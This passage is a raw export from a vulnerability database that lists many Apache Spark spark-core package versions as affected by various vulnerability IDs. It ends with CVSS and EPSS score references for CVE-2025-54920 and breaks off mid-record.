vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@1.6.2
47
url pkg:maven/org.apache.spark/spark-core_2.11@1.6.3
purl pkg:maven/org.apache.spark/spark-core_2.11@1.6.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@1.6.3
48
url pkg:maven/org.apache.spark/spark-core_2.11@2.0.0
purl pkg:maven/org.apache.spark/spark-core_2.11@2.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.0.0
49
url pkg:maven/org.apache.spark/spark-core_2.11@2.0.0-preview
purl pkg:maven/org.apache.spark/spark-core_2.11@2.0.0-preview
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.0.0-preview
50
url pkg:maven/org.apache.spark/spark-core_2.11@2.0.1
purl pkg:maven/org.apache.spark/spark-core_2.11@2.0.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.0.1
51
url pkg:maven/org.apache.spark/spark-core_2.11@2.0.2
purl pkg:maven/org.apache.spark/spark-core_2.11@2.0.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.0.2
52
url pkg:maven/org.apache.spark/spark-core_2.11@2.1.0
purl pkg:maven/org.apache.spark/spark-core_2.11@2.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-pgne-36yk-37bj
7
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.1.0
53
url pkg:maven/org.apache.spark/spark-core_2.11@2.1.1
purl pkg:maven/org.apache.spark/spark-core_2.11@2.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-6he5-ksrc-8kck
2
vulnerability VCID-adht-u2kn-j3hh
3
vulnerability VCID-as3y-ffvw-rube
4
vulnerability VCID-m3tv-j5mk-4ufj
5
vulnerability VCID-pa42-1gk4-9yhj
6
vulnerability VCID-pgne-36yk-37bj
7
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.1.1
54
url pkg:maven/org.apache.spark/spark-core_2.11@2.1.2
purl pkg:maven/org.apache.spark/spark-core_2.11@2.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
2
vulnerability VCID-m3tv-j5mk-4ufj
3
vulnerability VCID-pa42-1gk4-9yhj
4
vulnerability VCID-pgne-36yk-37bj
5
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.1.2
55
url pkg:maven/org.apache.spark/spark-core_2.11@2.1.3
purl pkg:maven/org.apache.spark/spark-core_2.11@2.1.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
2
vulnerability VCID-m3tv-j5mk-4ufj
3
vulnerability VCID-pa42-1gk4-9yhj
4
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.1.3
56
url pkg:maven/org.apache.spark/spark-core_2.11@2.2.0
purl pkg:maven/org.apache.spark/spark-core_2.11@2.2.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
2
vulnerability VCID-pa42-1gk4-9yhj
3
vulnerability VCID-pgne-36yk-37bj
4
vulnerability VCID-vqmm-ru8x-ukcx
5
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.2.0
57
url pkg:maven/org.apache.spark/spark-core_2.11@2.2.1
purl pkg:maven/org.apache.spark/spark-core_2.11@2.2.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
2
vulnerability VCID-pa42-1gk4-9yhj
3
vulnerability VCID-pgne-36yk-37bj
4
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.2.1
58
url pkg:maven/org.apache.spark/spark-core_2.11@2.2.2
purl pkg:maven/org.apache.spark/spark-core_2.11@2.2.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
2
vulnerability VCID-pa42-1gk4-9yhj
3
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.2.2
59
url pkg:maven/org.apache.spark/spark-core_2.11@2.2.3
purl pkg:maven/org.apache.spark/spark-core_2.11@2.2.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
2
vulnerability VCID-pa42-1gk4-9yhj
3
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.2.3
60
url pkg:maven/org.apache.spark/spark-core_2.11@2.3.0
purl pkg:maven/org.apache.spark/spark-core_2.11@2.3.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
2
vulnerability VCID-pa42-1gk4-9yhj
3
vulnerability VCID-pgne-36yk-37bj
4
vulnerability VCID-vqmm-ru8x-ukcx
5
vulnerability VCID-y6p4-rd9t-cqad
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.3.0
61
url pkg:maven/org.apache.spark/spark-core_2.11@2.3.1
purl pkg:maven/org.apache.spark/spark-core_2.11@2.3.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
2
vulnerability VCID-pa42-1gk4-9yhj
3
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.3.1
62
url pkg:maven/org.apache.spark/spark-core_2.11@2.3.2
purl pkg:maven/org.apache.spark/spark-core_2.11@2.3.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
2
vulnerability VCID-pa42-1gk4-9yhj
3
vulnerability VCID-vqmm-ru8x-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.3.2
63
url pkg:maven/org.apache.spark/spark-core_2.11@2.3.3
purl pkg:maven/org.apache.spark/spark-core_2.11@2.3.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.3.3
64
url pkg:maven/org.apache.spark/spark-core_2.11@2.3.4
purl pkg:maven/org.apache.spark/spark-core_2.11@2.3.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.3.4
65
url pkg:maven/org.apache.spark/spark-core_2.11@2.4.0
purl pkg:maven/org.apache.spark/spark-core_2.11@2.4.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.4.0
66
url pkg:maven/org.apache.spark/spark-core_2.11@2.4.1
purl pkg:maven/org.apache.spark/spark-core_2.11@2.4.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.4.1
67
url pkg:maven/org.apache.spark/spark-core_2.11@2.4.2
purl pkg:maven/org.apache.spark/spark-core_2.11@2.4.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.4.2
68
url pkg:maven/org.apache.spark/spark-core_2.11@2.4.3
purl pkg:maven/org.apache.spark/spark-core_2.11@2.4.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.4.3
69
url pkg:maven/org.apache.spark/spark-core_2.11@2.4.4
purl pkg:maven/org.apache.spark/spark-core_2.11@2.4.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.4.4
70
url pkg:maven/org.apache.spark/spark-core_2.11@2.4.5
purl pkg:maven/org.apache.spark/spark-core_2.11@2.4.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.4.5
71
url pkg:maven/org.apache.spark/spark-core_2.11@2.4.6
purl pkg:maven/org.apache.spark/spark-core_2.11@2.4.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.4.6
72
url pkg:maven/org.apache.spark/spark-core_2.11@2.4.7
purl pkg:maven/org.apache.spark/spark-core_2.11@2.4.7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.4.7
73
url pkg:maven/org.apache.spark/spark-core_2.11@2.4.8
purl pkg:maven/org.apache.spark/spark-core_2.11@2.4.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-as3y-ffvw-rube
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.4.8
74
url pkg:maven/org.apache.spark/spark-core_2.12@3.3.4
purl pkg:maven/org.apache.spark/spark-core_2.12@3.3.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.3.4
75
url pkg:maven/org.apache.spark/spark-core_2.12@3.4.0
purl pkg:maven/org.apache.spark/spark-core_2.12@3.4.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.4.0
76
url pkg:maven/org.apache.spark/spark-core_2.12@3.4.1
purl pkg:maven/org.apache.spark/spark-core_2.12@3.4.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.4.1
77
url pkg:maven/org.apache.spark/spark-core_2.12@3.4.2
purl pkg:maven/org.apache.spark/spark-core_2.12@3.4.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.4.2
78
url pkg:maven/org.apache.spark/spark-core_2.12@3.4.3
purl pkg:maven/org.apache.spark/spark-core_2.12@3.4.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.4.3
79
url pkg:maven/org.apache.spark/spark-core_2.12@3.4.4
purl pkg:maven/org.apache.spark/spark-core_2.12@3.4.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.4.4
80
url pkg:maven/org.apache.spark/spark-core_2.12@3.5.0
purl pkg:maven/org.apache.spark/spark-core_2.12@3.5.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.5.0
81
url pkg:maven/org.apache.spark/spark-core_2.12@3.5.1
purl pkg:maven/org.apache.spark/spark-core_2.12@3.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.5.1
82
url pkg:maven/org.apache.spark/spark-core_2.12@3.5.2
purl pkg:maven/org.apache.spark/spark-core_2.12@3.5.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.5.2
83
url pkg:maven/org.apache.spark/spark-core_2.12@3.5.3
purl pkg:maven/org.apache.spark/spark-core_2.12@3.5.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.5.3
84
url pkg:maven/org.apache.spark/spark-core_2.12@3.5.4
purl pkg:maven/org.apache.spark/spark-core_2.12@3.5.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.5.4
85
url pkg:maven/org.apache.spark/spark-core_2.12@3.5.5
purl pkg:maven/org.apache.spark/spark-core_2.12@3.5.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.5.5
86
url pkg:maven/org.apache.spark/spark-core_2.12@3.5.6
purl pkg:maven/org.apache.spark/spark-core_2.12@3.5.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.5.6
87
url pkg:maven/org.apache.spark/spark-core_2.12@2.4.0
purl pkg:maven/org.apache.spark/spark-core_2.12@2.4.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@2.4.0
88
url pkg:maven/org.apache.spark/spark-core_2.12@2.4.1
purl pkg:maven/org.apache.spark/spark-core_2.12@2.4.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@2.4.1
89
url pkg:maven/org.apache.spark/spark-core_2.12@2.4.2
purl pkg:maven/org.apache.spark/spark-core_2.12@2.4.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@2.4.2
90
url pkg:maven/org.apache.spark/spark-core_2.12@2.4.3
purl pkg:maven/org.apache.spark/spark-core_2.12@2.4.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@2.4.3
91
url pkg:maven/org.apache.spark/spark-core_2.12@2.4.4
purl pkg:maven/org.apache.spark/spark-core_2.12@2.4.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@2.4.4
92
url pkg:maven/org.apache.spark/spark-core_2.12@2.4.5
purl pkg:maven/org.apache.spark/spark-core_2.12@2.4.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@2.4.5
93
url pkg:maven/org.apache.spark/spark-core_2.12@2.4.6
purl pkg:maven/org.apache.spark/spark-core_2.12@2.4.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@2.4.6
94
url pkg:maven/org.apache.spark/spark-core_2.12@2.4.7
purl pkg:maven/org.apache.spark/spark-core_2.12@2.4.7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@2.4.7
95
url pkg:maven/org.apache.spark/spark-core_2.12@2.4.8
purl pkg:maven/org.apache.spark/spark-core_2.12@2.4.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@2.4.8
96
url pkg:maven/org.apache.spark/spark-core_2.12@3.0.0
purl pkg:maven/org.apache.spark/spark-core_2.12@3.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.0.0
97
url pkg:maven/org.apache.spark/spark-core_2.12@3.0.0-preview
purl pkg:maven/org.apache.spark/spark-core_2.12@3.0.0-preview
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.0.0-preview
98
url pkg:maven/org.apache.spark/spark-core_2.12@3.0.0-preview2
purl pkg:maven/org.apache.spark/spark-core_2.12@3.0.0-preview2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.0.0-preview2
99
url pkg:maven/org.apache.spark/spark-core_2.12@3.0.1
purl pkg:maven/org.apache.spark/spark-core_2.12@3.0.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.0.1
100
url pkg:maven/org.apache.spark/spark-core_2.12@3.0.2
purl pkg:maven/org.apache.spark/spark-core_2.12@3.0.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.0.2
101
url pkg:maven/org.apache.spark/spark-core_2.12@3.0.3
purl pkg:maven/org.apache.spark/spark-core_2.12@3.0.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.0.3
102
url pkg:maven/org.apache.spark/spark-core_2.12@3.1.0
purl pkg:maven/org.apache.spark/spark-core_2.12@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.1.0
103
url pkg:maven/org.apache.spark/spark-core_2.12@3.1.1
purl pkg:maven/org.apache.spark/spark-core_2.12@3.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.1.1
104
url pkg:maven/org.apache.spark/spark-core_2.12@3.1.2
purl pkg:maven/org.apache.spark/spark-core_2.12@3.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.1.2
105
url pkg:maven/org.apache.spark/spark-core_2.12@3.1.3
purl pkg:maven/org.apache.spark/spark-core_2.12@3.1.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.1.3
106
url pkg:maven/org.apache.spark/spark-core_2.12@3.2.0
purl pkg:maven/org.apache.spark/spark-core_2.12@3.2.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.2.0
107
url pkg:maven/org.apache.spark/spark-core_2.12@3.2.1
purl pkg:maven/org.apache.spark/spark-core_2.12@3.2.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.2.1
108
url pkg:maven/org.apache.spark/spark-core_2.12@3.2.2
purl pkg:maven/org.apache.spark/spark-core_2.12@3.2.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.2.2
109
url pkg:maven/org.apache.spark/spark-core_2.12@3.2.3
purl pkg:maven/org.apache.spark/spark-core_2.12@3.2.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.2.3
110
url pkg:maven/org.apache.spark/spark-core_2.12@3.2.4
purl pkg:maven/org.apache.spark/spark-core_2.12@3.2.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.2.4
111
url pkg:maven/org.apache.spark/spark-core_2.12@3.3.0
purl pkg:maven/org.apache.spark/spark-core_2.12@3.3.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
2
vulnerability VCID-v1xx-eddq-aqcu
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.3.0
112
url pkg:maven/org.apache.spark/spark-core_2.12@3.3.1
purl pkg:maven/org.apache.spark/spark-core_2.12@3.3.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.3.1
113
url pkg:maven/org.apache.spark/spark-core_2.12@3.3.2
purl pkg:maven/org.apache.spark/spark-core_2.12@3.3.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
1
vulnerability VCID-1hnx-b71k-mqat
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.3.2
114
url pkg:maven/org.apache.spark/spark-core_2.12@3.3.3
purl pkg:maven/org.apache.spark/spark-core_2.12@3.3.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.3.3
115
url pkg:maven/org.apache.spark/spark-core_2.13@4.0.0
purl pkg:maven/org.apache.spark/spark-core_2.13@4.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.13@4.0.0
116
url pkg:maven/org.apache.spark/spark-core_2.9.3@0.8.0-incubating
purl pkg:maven/org.apache.spark/spark-core_2.9.3@0.8.0-incubating
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.9.3@0.8.0-incubating
117
url pkg:maven/org.apache.spark/spark-core_2.9.3@0.8.1-incubating
purl pkg:maven/org.apache.spark/spark-core_2.9.3@0.8.1-incubating
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1gtx-thb1-9ud6
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.9.3@0.8.1-incubating
References
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-54920.json
reference_id
reference_type
scores
0
value 6.7
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-54920.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-54920
reference_id
reference_type
scores
0
value 0.00498
scoring_system epss
scoring_elements 0.65841
published_at 2026-04-02T12:55:00Z
1
value 0.00498
scoring_system epss
scoring_elements 0.65837
published_at 2026-04-07T12:55:00Z
2
value 0.00498
